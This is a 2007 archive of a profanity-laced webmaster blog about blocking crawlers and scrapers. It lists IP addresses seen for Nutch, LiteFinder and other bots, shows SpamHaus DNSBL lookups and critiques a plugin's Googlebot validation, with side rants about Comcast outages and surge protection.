IncrediBILL's Random Rants: 2007

Monday, December 31, 2007

How Much Nutch is TOO MUCH Nutch Revisited

To date there have been 585 unique IPs hitting my server since I started tracking this nuisance called nutch.

Here's a list of IPs with nutch sightings to date:

12.47.49.97
13.1.137.86
13.1.139.202
13.1.139.205
13.1.139.206
13.1.139.211
13.1.139.212
13.1.139.213
15.203.249.124
24.12.140.54
24.222.153.250
24.231.207.219
24.247.204.244
24.5.71.1
24.6.168.184
24.94.62.119
35.10.2.90
58.186.61.164
58.187.12.236
58.187.22.230
58.215.74.242
58.215.74.253
58.215.75.2
58.68.42.138
58.87.139.90
59.160.240.115
59.160.240.116
59.160.240.183
59.160.240.184
59.160.240.185
59.176.10.136
60.248.9.114
61.135.151.175
61.246.2.241
61.8.140.20
62.129.132.47
62.168.188.151
62.192.109.66
62.192.11.2
62.40.33.173
62.40.36.87
62.54.4.138
63.133.162.98
63.246.7.209
63.82.23.2
64.105.36.210
64.106.247.178
64.18.197.136
64.209.138.200
64.229.206.25
64.229.222.170
64.229.226.126
64.229.33.51
64.231.233.162
64.236.128.27
64.241.242.18
64.242.88.10
64.242.88.60
64.34.172.78
64.34.180.167
64.38.10.26
64.47.51.158
64.71.164.125
65.120.64.146
65.220.67.9
65.92.160.39
65.95.155.163
66.132.240.180
66.132.249.23
66.135.44.34
66.135.44.35
66.135.44.36
66.135.44.37
66.135.44.38
66.135.44.39
66.135.44.40
66.135.44.41
66.135.44.42
66.135.44.43
66.135.44.44
66.135.44.46
66.135.44.48
66.135.44.49
66.135.44.50
66.135.44.51
66.135.44.52
66.135.44.53
66.15.68.234
66.207.120.226
66.24.192.59
66.24.198.171
66.24.199.39
66.24.240.206
66.243.31.34
66.30.10.222
66.92.153.138
67.110.56.45
67.110.58.2
67.111.28.139
67.184.246.61
67.202.20.30
67.202.49.49
67.202.6.11
67.52.101.242
67.68.42.2
67.70.155.226
67.71.89.27
67.95.51.86
68.178.171.109
68.178.202.79
68.205.124.164
68.205.127.94
68.228.72.198
68.97.222.117
69.248.26.83
69.36.233.8
69.55.233.28
69.60.125.233
69.90.45.7
69.93.236.178
70.143.79.234
70.187.130.253
70.197.81.79
70.21.122.162
70.48.46.56
70.50.75.8
70.56.66.216
70.62.103.114
70.85.198.178
70.87.14.34
70.90.188.18
70.96.99.254
71.216.0.210
71.217.33.149
71.241.153.125
71.35.163.79
71.98.182.170
72.0.207.162
72.2.25.66
72.2.25.67
72.2.25.71
72.21.6.146
72.21.6.147
72.21.6.148
72.232.202.50
72.232.223.234
72.232.228.58
72.233.38.194
72.233.38.195
72.233.38.196
72.233.38.197
72.36.114.145
72.36.114.147
72.36.115.42
72.36.115.45
72.36.115.47
72.36.115.52
72.36.115.53
72.36.115.54
72.36.115.56
72.36.115.57
72.36.115.59
72.36.115.64
72.36.115.65
72.36.115.68
72.36.115.69
72.36.115.70
72.36.115.72
72.36.115.73
72.36.115.74
72.36.115.77
72.36.115.79
72.36.115.80
72.36.94.100
72.36.94.106
72.36.94.107
72.36.94.109
72.36.94.110
72.36.94.112
72.36.94.113
72.36.94.118
72.36.94.119
72.36.94.121
72.36.94.122
72.36.94.123
72.36.94.124
72.36.94.169
72.36.94.173
72.36.94.176
72.36.94.179
72.36.94.181
72.36.94.182
72.36.94.20
72.36.94.201
72.36.94.203
72.36.94.243
72.36.94.38
72.36.94.39
72.36.94.48
72.36.94.50
72.36.94.52
72.36.94.54
72.36.94.56
72.36.94.60
72.36.94.61
72.36.94.68
72.36.94.90
72.36.94.92
72.36.94.96
72.36.94.99
72.36.95.12
72.36.95.131
72.36.95.134
72.36.95.145
72.36.95.146
72.36.95.147
72.36.95.148
72.36.95.149
72.36.95.150
72.36.95.152
72.36.95.154
72.36.95.155
72.36.95.156
72.36.95.157
72.36.95.158
72.36.95.160
72.36.95.161
72.36.95.162
72.36.95.165
72.36.95.166
72.36.95.167
72.36.95.168
72.36.95.170
72.36.95.173
72.36.95.176
72.36.95.177
72.36.95.178
72.36.95.179
72.36.95.183
72.36.95.185
72.36.95.207
72.36.95.209
72.36.95.212
72.36.95.214
72.36.95.217
72.36.95.218
72.36.95.226
72.36.95.227
72.36.95.230
72.36.95.231
72.36.95.232
72.36.95.236
72.36.95.237
72.36.95.238
72.36.95.239
72.36.95.251
72.44.58.104
72.44.58.167
72.44.58.173
72.44.58.244
72.44.58.252
72.44.62.107
72.44.62.122
72.44.62.124
72.44.62.151
72.44.62.162
72.44.62.166
72.44.62.197
72.44.62.199
72.44.62.208
72.44.62.245
72.5.173.12
72.5.173.22
72.51.37.148
72.84.30.230
74.111.22.20
74.111.7.226
74.208.11.120
74.39.192.237
74.52.54.130
74.69.164.2
74.98.30.178
74.98.32.176
75.126.142.100
75.126.204.194
75.44.225.44
80.38.119.131
80.79.35.55
81.173.148.94
81.173.155.210
81.203.142.109
81.67.169.232
81.93.168.211
82.150.138.138
82.150.138.139
82.16.40.198
83.149.77.7
83.246.79.28
84.101.58.177
84.101.58.70
84.191.111.92
84.231.72.32
84.231.74.47
84.57.138.191
85.117.62.114
85.145.108.135
85.17.184.39
85.17.184.41
85.177.142.252
85.179.194.32
85.179.196.134
85.18.14.22
85.214.83.174
85.52.193.36
85.88.35.34
85.88.35.35
85.88.35.37
85.88.35.41
87.139.106.60
87.233.142.106
87.242.77.169
87.69.22.130
87.98.222.116
88.191.23.109
88.198.212.50
88.74.95.48
89.149.208.224
89.31.118.248
123.113.184.253
124.157.145.165
124.32.246.36
124.32.246.45
128.174.240.249
128.174.240.251
128.174.241.130
128.174.245.163
128.208.1.160
128.208.3.173
128.208.4.10
128.208.6.125
128.208.6.200
128.208.6.207
128.208.6.226
128.208.6.227
128.208.6.232
128.208.6.75
128.208.6.77
128.238.35.93
128.95.1.189
128.97.88.68
128.97.88.70
129.242.19.138
129.34.20.19
129.78.64.106
131.112.125.102
131.112.125.103
131.112.125.104
131.112.125.106
131.112.16.220
131.211.84.21
132.178.248.36
132.178.248.47
133.30.112.143
140.247.62.79
140.247.62.80
141.30.193.12
141.30.193.5
141.30.193.6
144.92.194.22
145.99.243.67
147.202.73.2
147.202.74.2
147.202.76.2
147.202.81.2
147.202.90.2
159.226.5.82
164.67.195.201
164.67.195.245
164.67.195.26
164.67.195.27
164.67.195.67
164.67.195.68
164.67.195.86
166.214.93.76
192.17.240.18
192.17.240.19
192.17.240.20
192.17.240.21
192.17.240.22
192.17.240.25
192.17.240.26
192.17.240.27
192.17.240.28
192.17.240.29
192.17.240.30
192.17.240.32
192.17.240.33
192.17.240.34
192.17.240.36
192.17.240.41
192.17.240.42
192.17.240.43
192.17.240.44
192.17.240.45
192.17.240.46
192.17.240.47
192.17.240.48
192.17.240.50
192.17.240.52
192.17.240.53
192.17.240.54
192.17.240.55
192.17.240.56
192.17.240.57
192.17.240.58
192.17.240.59
192.17.240.60
192.17.240.62
192.17.240.65
192.17.240.71
192.17.240.73
192.17.240.74
192.17.240.76
192.17.240.79
192.17.240.81
193.138.250.141
193.138.250.237
193.145.45.68
193.203.240.117
193.203.240.118
193.203.240.119
193.203.240.120
193.203.240.121
193.203.240.122
193.203.240.135
193.205.213.166
193.252.148.51
193.42.229.3
193.42.84.5
194.153.145.119
194.153.145.15
195.250.53.25
195.72.131.70
195.72.131.71
195.72.131.72
195.72.131.73
195.72.131.74
195.72.131.75
195.72.131.76
195.72.131.77
195.72.131.78
195.72.131.79
195.72.131.80
195.72.131.81
195.72.131.82
195.72.131.85
195.72.131.86
195.72.131.87
195.72.131.88
195.72.131.89
195.72.131.90
195.72.131.91
195.72.131.92
195.72.131.93
196.203.50.219
198.87.235.130
198.87.235.142
199.4.160.10
200.152.240.214
202.10.82.98
202.174.61.198
202.20.190.235
202.20.192.195
202.69.141.20
202.98.1.120
203.113.130.205
203.147.0.44
203.199.83.162
203.244.218.1
204.123.46.105
204.123.47.91
204.228.230.38
204.228.230.43
206.222.21.2
206.222.9.122
207.115.108.202
207.176.224.241
207.176.224.244
207.176.224.245
207.214.93.42
208.109.126.135
208.64.57.65
208.96.10.200
208.96.10.201
208.96.54.71
208.96.54.72
208.96.54.73
208.96.54.76
208.96.54.77
208.96.54.79
208.96.54.80
208.96.54.81
208.96.54.82
208.96.54.83
208.96.54.84
208.96.54.85
208.96.54.86
208.96.54.88
208.96.54.89
208.96.54.90
208.96.54.91
208.96.54.95
209.139.209.220
209.139.209.224
209.51.212.10
209.51.212.18
209.51.212.26
209.85.62.159
209.85.62.162
209.85.88.150
210.174.3.130
210.196.73.193
210.245.31.15
210.245.31.18
211.152.34.34
212.101.97.63
212.12.114.238
212.137.33.140
212.156.230.210
212.166.192.129
212.174.130.121
212.174.130.122
212.58.116.72
213.132.171.245
213.132.175.101
213.157.204.141
213.219.170.12
213.251.133.12
216.163.188.200
216.163.188.201
216.182.225.186
216.182.229.37
216.182.229.39
216.182.229.91
216.182.230.40
216.182.230.54
216.182.230.75
216.182.236.46
216.182.236.77
216.182.237.45
216.182.238.83
216.231.36.92
216.24.131.152
216.58.87.217
216.93.185.12
217.10.144.242
217.106.233.192
217.153.59.26
217.31.51.128
217.80.112.146
218.25.39.81
220.130.191.231
220.130.191.232
220.130.191.233
220.130.191.234
220.130.191.235
220.130.191.236
220.130.191.237
220.130.191.238
220.130.191.239
220.130.191.240
220.226.195.162
220.226.195.163
220.226.195.165
220.226.195.166
220.226.195.167
220.226.195.168
221.114.253.210
221.116.237.114
221.221.140.114
221.221.237.35
222.173.249.33
222.210.196.26
222.46.17.43
222.46.17.47

If I weren't blocking nutch my server would probably be down in flames from the nutch DDoS.

Nothing dangerous about giving away code, not a thing.

Saturday, December 22, 2007

Covenant Eyes Needs Accountability

Here's yet another company making money from hitting your server without permission.

This one is an online service called Covenant Eyes that has a Net Nanny type of service that's been hitting one of my sites for ages. Over time they have requested thousands of pages, never got anything but an error message, but always keep trying using a blank user agent.

They operate from this range of IP's:

Covenant Eyes, Inc MOG-69-41-14-0 (NET-69-41-14-0-1)
69.41.14.0 - 69.41.14.127

Yesterday they suddenly started using this user agent after years of being blank:

69.41.14.83 "libcurl-agent/1.0"

The website claims:

Covenant Eyes Software provides Internet Integrity with accountability reports.

I guess it depends on who defines "Internet Integrity" or "accountability" because I personally don't find much integrity or accountability in hiding why you're hitting my website behind blank user agents or some default user agent.

The site also claims:

A church in town lost it's pastor to porn...

Which brings up the point that any rogue webmaster could cloak very bad content to Covenant Eyes and think it's funny to get someone in trouble that has an "accountability report" sent to a boss, spouse or parent so I hope someone checks to make sure these reports are accurate before punishing someone.

IMO blocking 69.41.14.* should stop their members from being "tempted" to visit your sites.

Wednesday, December 19, 2007

Snared Human Claims "I Ain't No Bot!"

When you snare a human in your bot trap they might be a little feisty and squirm a little. Those snared humans may even send you a scathing email claiming complete innocence, your tools are broken, bad bot blocker, BAD!

Amazing that his tool appears to be the one broken, not mine!

I nicely replied to this snared human and asked if he could explain why he downloaded a couple of hundred pages in just a few minutes, many of them the same page over and over and over again, sometimes several per second.

Sorry Mr. Human but your browser exhibits the same behavior as one of those high speed scrapers that have attacked me in the past and you were shut down for behaving badly.

I suspect he has PRE-FETCH enabled which is amusing because I have PRE-FETCH disabled server-side, so if he has it enabled it didn't identify itself as PRE-FETCH which is why he was snared.

Oh boo hoo, guess you'll just have to go waste someone else's bandwidth using that stupid browser that keeps downloading the same pages as fast as it can download them.

I won't miss you and don't let the door hit you on the way out.

Monday, December 17, 2007

Yahoo! Ignorance Shines in ShoeMoney Reputation Attack

Q: What do you do when your payment processing anti-fraud detection doesn't work?

A: It appears you fire your referring affiliate if your name is Yahoo!

That's right boys and girls, according to ShoeMoney the nitwits at Yahoo! obviously can't detect a fraudulent transaction and then blame someone who's under fire with a blatant reputation attack.

Now Yahoo! Stores and other properties do a lot of payment processing so they should have a ton of historical data, potentially from valid uses of the stolen credit cards themselves, so wouldn't you think with all this information they could flag a few fraud sales?

Apparently not.

OK, even if you don't have any historical data on the customer there are a few things you can do to easily combat what appears, based on the volume of transactions, to be automated fraud short of firing one of your affiliates.

1. Validate the account with email confirmation BEFORE processing the credit card in a 2 step process known as AUTH and BOOK. You pre-authorize the sale first, setting aside the money until you're sure the sale is valid and then BOOK the sale after the fact.

2. Require that the account creation and/or checkout page use several forms of automation blocking such as javascript and/or some form of captcha.

3. Obviously use full AVS (Address Verification) and require CSC / CVV2 (Credit Card Security Code) to make sure everything is OK per the credit card company.

4. Use GeoIP services to check that the IP address placing the order is even close to the actual address on the order and if not, flag it for human review before processing.

5. Do some basic IP blocking and restrict access to those account creation pages from hosting data centers, lists of known proxy servers, botnets and spammers.

There's a couple of other steps I'd take as well, but if someone could get past the 5 steps above without anything tripping at least one alarm for human review, I'd be shocked. Even if it was a human manually performing the attack the GeoIP should indicate a problem unless Yahoo just ignores it.

The only thing that cracks me up is ShoeMoney wanted to know what the referring URLs were and it's meaningless because the referring URL can be easily spoofed or blocked so it's a useless piece of information.

Consider that whoever did this only needed to visit your site one time to get your affiliate code and then using automation abuse it over and over again without ever visiting your site a second time and claiming in the referrer to be always coming from your site.

Cute huh?

Better yet, they didn't have to visit your site EVER because you allow your pages to be cached in the search engines so anyone could get your affiliate code directly from the search engines without leaving a trail on your website.

I've been preaching about using the meta "NOARCHIVE" for years now and this is just another reason to use it, but nobody listens and I digress...

Just to prove that the Michelle from Yahoo! was completely clueless about how internet fraud works she asked ShoeMoney to do the following:

I wanted to give you a heads up in advance to see if there was anyway you could filter or prevent fraudulent users from coming through your website/links. If so, we’d like to continue our partnership.

The odds are very high that this activity isn't passing through ShoeMoney's site whatsoever, even if it's being done manually, because they don't want to leave a trail that's too obvious.

Sorry to see you get the boot Shoe (punny) but it would appear that Yahoo! doesn't mind making a public spectacle of their shortcomings and now it's open season on YSM thanks to them admitting they can't tell a fraud transaction.

This should be loads of fun to see what happens next.

Monday, December 10, 2007

Block List Babelfish Desperately Needed

After spending a few days trying to come up with a more comprehensive method of identifying known pre-existing bad IPs using the existing block lists it has become quite maddening.

SpamHaus has their collection criteria which comes up with one set of BL results, ProjectHoneyPot has their methods and even different results, and so on and so forth. Then I have my methods which traps IPs that may intersect those BL's but quite often cough up brand new IPs not showing in the other BLs for spammers and scrapers. Collectively all of these BLs, including my own, are quite comprehensive but unfortunately there's no easy way to combine them all in a real-time manner that makes sense.

Sadly, the current state of affairs is that there are just too many independent services to use that makes the process overwhelming for the average webmaster which probably opts just to pick one, which would let things slip through the cracks, out of frustration. Picking block list A over block list B might be the difference between your server getting hacked just because one list knew about the malicious botnet IP and the other list didn't.

Funny, if this were anti-virus software people wouldn't just pick any old thing, they would want comprehensive coverage, so why can't we get comprehensive coverage in block lists?

What is desperately needed is some mechanism to pool all the results together into one common service, a Block List Babelfish, where a single access can get the combined collective intelligence on whether the IP is good or bad so that everyone can easily benefit.

If anyone knows of a good BL aggregator let me know, OK?

Saturday, December 08, 2007

Validate Link Integrity Using DNSBL's like SpamHaus ZEN

People tend to just think that lists from sites like SpamHaus are only good for blocking spam from coming into your servers but that's just the tip of the iceberg if you're open to some creative thinking.

Since Google penalizes sites that link out to bad neighborhoods one potential use for SpamHaus ZEN is to help automatically identify bad sites and remove them. For people that run directories or have massive amounts of outbound links this means you can protect your visitors, as well as your reputation in Google and other places, via zen.spamhaus.org and eliminate links to IPs associated with spammers, 3rd party exploits, proxies, worms and trojans!

How's that for a kick ass way to clean up your site?

Keep in mind that on a shared server that a single IP address may represent multiple domains on a server. That means any domain on a server either spamming or otherwise compromised will impact all domains associated with that IP so many people may be effected that don't know there's a problem. However, since that server can be a hazard to the general population at large, it's best to err on the side of caution and suspend your association with all sites on that server until the problem is resolved.

Since most sites don't even know that they've been infected I merely quarantine those links until they are no longer being reported as hostile and then enable them again after they have been confirmed to be clean.

Not that everything will be listed in SpamHaus ZEN as much of the malicious activity I see isn't in their index, but it's a good reference for known bad sites.

Here's an example of how to check an IP address in SpamHaus using a spammers IP currently in the DNSBL.

Take the IP address 64.151.120.13 and reverse it to 13.120.151.64 and then combine the IP address to zen.spamhaus.org like this: 13.120.151.64.zen.spamhaus.org.

Using any DNS checking tool, query the DNSBL for the existence of 13.120.151.64.zen.spamhaus.org.

The IP is currently in the DNSBL you'll get a result like this:

host 13.120.151.64.zen.spamhaus.org
13.120.151.64.zen.spamhaus.org has address 127.0.0.2

If the IP address is not in the DNSBL you'll get a response like this:

host 13.120.151.123.zen.spamhaus.org
Host 13.120.151.123.zen.spamhaus.org not found: 3(NXDOMAIN)

The result codes from SpamHaus are as follows:

127.0.0.2 - SpamHaus Block List (SBL)
127.0.0.4-8 - Exploits Block List (XBL)
127.0.0.10-11 - Policy Block List (PBL)

The last list, the PBL, is probably something I wouldn't auto-block with a link checker or any other use (except anti-spam) unless I reviewed what it was blocking first so those errors, if they ever come up, are only set as "warnings" in my current implementation.

Thursday, December 06, 2007

Bad Behavior Needs Behavior Modification

WebGeek recently reported on Bad Behavior Behaving Badly where he got locked out of all his own blogs and was listed as an enemy of the state and put on the FBI's 10 most wanted geek list and all sorts of things.

OK, I'm exaggerating but read his post and it's close enough.

Anyway, there was something he mentioned about being concerned with:

"If left unattended in this state for a long time, a site could lose valuable search engine rankings, after the spiders of the Big 3 (Google, Yahoo, and MSN) find that they are locked out repeatedly with 403 errors."

Since he mentioned it, I've looked over the source code for Bad Behavior before and how they validate robots isn't something I'd put on my website because it relies solely on IP ranges alone and they are incomplete based on raw information I've collected from the crawlers themselves.

The search engines have clearly stated that they may expand into new IP ranges at any time without notice and the only official way to validate their main crawlers is with full round trip DNS checking to validate Googlebot for instance with IP ranges as a backup just in case they make a mistake.

So this code could easily be obsolete at any time:

if( stripos($ua, "Googlebot") !== FALSE || stripos($ua, "Mediapartners-Google") !== FALSE) {
require_once(BB2_CORE . "/google.inc.php");
}

// Analyze user agents claiming to be Googlebot
function bb2_google($package)
{
if (match_cidr($package['ip'], "66.249.64.0/19") === FALSE && match_cidr($package['ip'], "64.233.160.0/19") === FALSE) {
return "f1182195";
}
return false;
}

Even more importantly, I've tracked Google crawlers in the following IP ranges which is 2 more IP ranges than Bad Behavior has in their code!

64.233.160.0 - 64.233.191.255
66.249.64.0 - 66.249.95.255
72.14.192.0 - 72.14.239.255
216.239.32.0 - 216.239.63.255

The same criticism exists for validating the other bots in that Bad Behavior needs to have a little more robustness in the validation code so that it isn't accidentally blocking valid robots from indexing web pages. Unless I'm missing something I don't even see where Yahoo crawlers are specifically validated (I'm tracking 11 IP ranges for Yahoo) and MSNBOT was missing the 131.107.0.0/16 CIDR range, etc..

As it stands, the code doesn't have all the IP ranges that I've seen used for any of the major search engines so there is some risk, albeit not a big risk, that some legitimate search engine traffic is being bounced.

Not only that, but the MSIE validation is full of holes and most of the stealth crawlers I block will zip right through Bad Behavior and scrape the blog.

I think WebGeek is right, I would disable the add-in until those issues are resolved.

LiteFinder REALLY Go Fuck Yourself Now

In my opinion this whole LiteFinder Network Crawler is completely bogus.

Yesterday I commented on their crawler, which now just appears to be a ruse to lure people to their web site which is nothing but a big front for affiliate links.

Go to the LiteFinder home page and take a look at the main topics: Adult: Penis Enlargement, Online Gambling or the popular searches for "Phentermine" or "Breast Enlargement Pill".

Riiiiight.

This site is so spammy it would make Sanford Wallace blush.

The so-called search feature doesn't search shit, it just spits up a bunch of bullshit links.

Here's the results for a query on PLUMBING:

Shop
Browse and compare a great selection of .
www.somesite.com

Save up to 95% - diamond jewelry, engagement rings, designer watches, and much more. Live auctions starting at one dollar
somedomain.com

Gold, and Silver Jewelry
Great selection of jewelry including Rings, Necklaces, Bracelets, Pendants, Earrings, Body Jewelry, and Spazio watches.
somejewelry.com

Bored? Check Out the Sumo!
Viral video mayhem. Games Galore. Sucker free music. Bangin' Hotties. Animation for your fascination. Go to the Sumo, live large and never be disappointed by a weak video website again.
www.somesite.com

Etc. you get the idea...

What purpose is a crawler that doesn't feed a search engine?

You've got it, it's a lure, we've been had.

This LiteFinder Network Crawler thing just needs to be blocked, that's all there is to it.

Wednesday, December 05, 2007

LiteFinder Network Crawler Go Fuck Yourself

I don't get too riled up until I read some self-serving pompous bullshit like this that just makes the hair stand up on the back of my neck:

Can I learn the IP addresses, which LiteFinder Network Crawler comes from?
Unfortunately, You can't since it is against the rules of our company.

The user agent for this mess is:

"Mozilla/5.0 (compatible; LiteFinder/1.0; +http://www.litefinder.net/about.html)"

Since they don't feel like sharing the IP addresses, let me do the honors since it's not against MY company policy:

208.101.44.3 -> mybluewine.net.
209.160.65.42 -> hopone.net.
209.62.109.178 -> ev1s-209-62-109-178.ev1servers.net.
216.40.220.34 -> ev1s-216-40-220-34.ev1servers.net.
216.40.222.50 -> ev1s-216-40-222-50.ev1servers.net.
216.40.222.66 -> ev1s-216-40-222-66.ev1servers.net.
216.40.222.82 -> ev1s-216-40-222-82.ev1servers.net.
216.40.222.98 -> ev1s-216-40-222-98.ev1servers.net.
67.19.114.226 -> w103.networkharmony.com.
67.19.250.26 -> 1a.fa.1343.static.theplanet.com.
70.85.113.242 -> f2.71.5546.static.theplanet.com.
74.53.243.226 -> e2.f3.354a.static.theplanet.com.
74.53.243.242 -> f2.f3.354a.static.theplanet.com.
74.53.244.18 -> 12.f4.354a.static.theplanet.com.
74.53.249.34 -> 22.f9.354a.static.theplanet.com.
74.86.209.74 -> templatestill.com.
74.86.249.98 -> westhoste.net.
75.125.18.178 -> ev1s-75-125-18-178.ev1servers.net.
75.125.47.162 -> ev1s-75-125-47-162.ev1servers.net.
75.125.52.146 -> ev1s-75-125-52-146.ev1servers.net.
84.19.176.208 -> ns.km22118.keymachine.de.
87.118.118.111 -> ns.km31417.keymachine.de.
87.118.98.57 -> ns.km22427.keymachine.de.
87.118.98.62 -> ns.km22426.keymachine.de.

There you go, all the IPs I've seen them use and they can shove the rules of their company where the sun doesn't shine.

Surge Protection - Get it before it's TOO LATE!

I know many of you think surge protection is a bunch of hype but the father of a good friend just found out a few days ago that surge protection is a must have. Lightning apparently zapped their house and took out every single appliance, TVs, radios, computers and a nice big Wurlitzer organ all in one shot totaling over $20K in damages.

That was just enough to make me get off my ass and double check that all of our most expensive gear, like my computer, printers, big screen TV, DVRs, etc. were all plugged into the proper place on the UPS/Surge protector since the rainy season is starting in California.

For those of you that still have doubts about surge protection, and the odds that lightning will never hit your house, let me tell you about an old buddy of mine from Kansas City. He had a computer that got hit by lightning on the power line, fried the box. He went out and got a new computer and a surge protector for the electrical line. Then about a year later lightning hit the phone line and blew his computer apart when it came in via the modem. Again, he replaced the computer and this time put a surge protector on his phone line as well. Unfortunately, God didn't want him to have a computer and the 3rd time lightning shot in through the window and blew the computer off his desk. Last time I checked they don't make surge protectors for windows.

Anyway, if you don't have a surge protector for your electrical, phone and cable it's time to install one and move the computer away from the window so lightning can't easily blast it off your desk just to show you who's boss.

GEO Targeting Issues with Sprint Wireless Broadband

Testing my new Sprint Wireless Broadband turned up something that I didn't quite expect in regards to Geo targeting because the IP addresses used all are attributed to Southern California and I'm in Northern California.

I understand that privacy is a concern and you don't want people to know exactly where you are but being off by 600 miles is a bit much as nothing works right that tries to Geo target and some things can become down right annoying, such as AdSense showing you ads for local shit in Irvine California.

Nothing show stopping, just annoying.

Saturday, December 01, 2007

Comcast Dead While Sprint Hobbles Along

My connection to the internet has been so reliable for so many years that I had almost forgotten that the whole goddamn thing is cobbled together with bailing wire, band-aids and bubble gum.

Comcast in their infinite wisdom apparently did an upgrade to the network sometime Thursday afternoon and BOOM! the whole city went offline. When I called the message on their support line said people in my area just needed to power cycle the modem and it would reconnect. OK assholes, I had power cycled the fucking modem BEFORE I called for your tech support dept. to dole out bushels of meaningless platitudes and it still wasn't working so it's obvious I'm already fucked.

Tech support lady answered and asked me for my MAC address and in a couple of seconds confirmed that I was fucked and someone with a can of vasoline and some rubber gloves would be sent out the next morning to finish the job, er FIX the problem.

Next morning someone shows up right on time, which was an omen, and diagnoses the connection. Claimed everything was OK coming in so it must be the old modem, yeah right, whatever, swaps out the modem and gets us online and leaves.

Looks good, quick fix, right?

Wrong!

The new cable modem starts randomly taking a dump for a few minutes here and there and the next morning promptly decides to take a permanent dump and never comes back.

<SARCASM style: thick>
Yup, it was definitely the old modem having a problem.
</SARCASM>

So back to waiting online for the next technical support moron that knows way less about modems that I do, considering I've written software to drive a modem, which makes the idiotic conversation we're about to have not only insulting but maddening.

Here comes the idiot tech support questions:

TS: "Can you power cycle the modem for me?"
ME: "If that worked we wouldn't be on the phone at the moment!"

TS: "Do you have the modem connected directly to the computer or a hub?"
ME: "What does that matter? A stand alone cable modem plugged into Comcast alone will synch to the network if it can find the network, which it can't. Would you like me to explain to you what those lights mean on the front of the modem? I've got plenty of time since I can't get onto the internet and do any work..."

TS: "We can't seem to contact your modem from here so we'll need to send out a service technician."
ME: "Same problem as yesterday that you already 'fixed' once but we can try it again."

Anyway, they finally gave us a time for the next service technician to arrive tomorrow.

To be honest, if Comcast is down it shouldn't matter because our city is Wifi enabled!

Yeah, right, I'm on the border of the city's Wifi signal so I can see it every now and then but it's not strong enough to connect with.

However, a bunch of idiot neighbors have unprotected wireless networks that I could just hop on and use if I were that kind of guy, tempting but no thanks.

Anyway, here I site with ZERO faith in Comcast at the moment so I ran over to the Sprint store and picked up one of those nifty Wireless Broadband USB devices with an unlimited bandwidth plan for $60/month and a screaming [cough] 500kbps, but it beats dial-up.

Bring that new Sprint toy home, plug it in to the USB port, it self-installs and works out of the box without a hitch, sweet, right?

Well, it would be sweet except their fucking "Sprint Mobile Broadband Connection Manager" started crashing all the time. The application just blows up without warning, BLAMMO!, and down goes your connection. As a matter of fact, my computer NEVER crashes and this unstable software managed to lock up the PC to the point I had to do a cold reboot.

Guess I'll focus on the positive side that at least Sprint got me online, for some period of time, which is more than I can say for Comcast in the last few days.

They better get this shit fixed tomorrow because I'm bordering on going ballistic at the moment.

UPDATE: Comcast actually showed up on time and figured out the problem the second time and it was never the modem they replaced causing the problem, but what else is new.

Monday, November 19, 2007

Live.com's Search Spam Hysteria and Area 131.107.0.*

There are a lot of recent posts from people reaching a near hysteria fever pitch over what appears to be Live.com scouring the 'net looking for black hat sites doing things like cloaking or worse.

What they're all posting about appears to be that MS Live.com is doing some stealth crawling that appears to be sending bogus query strings looking for pages that change their response based on the query, which is what cloaked web sites do, and display advertising related to the topic that brought you to the page.

However, I've seen a few thousand other mysterious page requests from that IP range which most of you probably haven't noticed that I'll share below, which may or may not be related, hard to say at this point.

Sometimes, but not always, the IP address claims to be coming via a proxy such as:

1.1 SEA-PRXY-02
1.1 SEA-PRXY-01
"1.1 NET-PRXY-03, 1.1 NET-PRXY-04"
1.1 NET-PRXY-04
1.1 RED-PRXY-30
... and more

Maybe some of this is unrelated, maybe it's totally relevant, who knows except MS and they aren't telling. However, starting as far back as 01/07/2007 my bot blocker started trapping what appeared to be stealth crawl activity in the 131.107.*** range:

01/07/2007 131.107.0.96
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)"

01/12/2007 131.107.0.95
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)"

01/15/2007 131.107.0.104
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; I
nfoPath.1; .NET CLR 2.0.50727)"

Then it appears a human responded to a bot challenge:

01/15/2007 15:56:38 RESPONSE 131.107.0.104
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; In
foPath.1; .NET CLR 2.0.50727)"

Then this BLANK user agent started hitting on the same day

01/15/2007 131.107.0.86 ""

Then the sudden challenges and responses on 131.107.0.104 happened again so maybe that really was a human behind at least one of those proxies, who knows.

The blank UA on 131.107.0.86 kept asking for thousands of pages for many weeks, including "/robot.txt" that made me giggle.

In the middle of all this there's this little nugget:

03/29/200 131.107.0.96 "Wget/1.8.1"

Then in March there's another rash of challenge's in 131.107.0.* and a single response on 131.107.0.104:

04/28/2007 RESPONSE 131.107.0.104
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; In
foPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"

What does it all mean? No clue yet...

Suddenly after months the blank UA's on the 131.107.0.104 megacrawl seem to come to a close.

Then we get this little gem:

05/30/2007 131.107.0.95 "LWP::Simple/5.805"

June has a mix of challenges and a couple of responses so humans may use that IP block every now and then.

Then these nuggets pop up:

07/10/2007 131.107.0.95 "Java/1.6.0_01"
07/10/2007 131.107.0.96 "Wget/1.8.1"
07/13/2007 131.107.0.86 "" the blank UA starts crawling again.

Blank UA shows up on other IPs:

07/23/2007 131.107.0.101 ""
07/23/2007 131.107.0.104 ""
07/23/2007 131.107.0.96 ""
07/24/2007 131.107.0.73 ""
07/26/2007 131.107.0.96 ""
07/27/2007 131.107.0.95 ""

Now one IP with blank UA crawls a few days:

10/16/2007 to 11/05/2007 131.107.0.104 ""

Then the PERL crawl begins:

11/15/2007 131.107.0.96 "libwww-perl/5.805"
11/16/2007 131.107.0.95 "libwww-perl/5.805"

And those last two IPs are still currently crawling as "libwww-perl/5.805" as I write this.

When you add it all up a couple of things that come to mind are that Microsoft is checking for cloaking, has some pet projects possibly being tested and/or they are checking to see how websites respond to a browser user agent vs. user agents that are normally blocked and it's probably a mix of all the above.

See the response from msndude msg#3442263 on WebmasterWorld:

First, we appreciate the concerns and issues that have been raised and apologize for any incovenience this might have caused.
Second, we want to explain what this is all about. The traffic you are seeing is part of a quality check we run on selected pages. While we work on addressing your conerns, we would request that you do not actively block the IP addreses used by this quality check; blocking these IP addresses could prevent your site from being included in the Live Search index.
Please keep the feedback and thoughts coming as we will use this to help improve this process and make sure that it impacts your sites as little as possible.

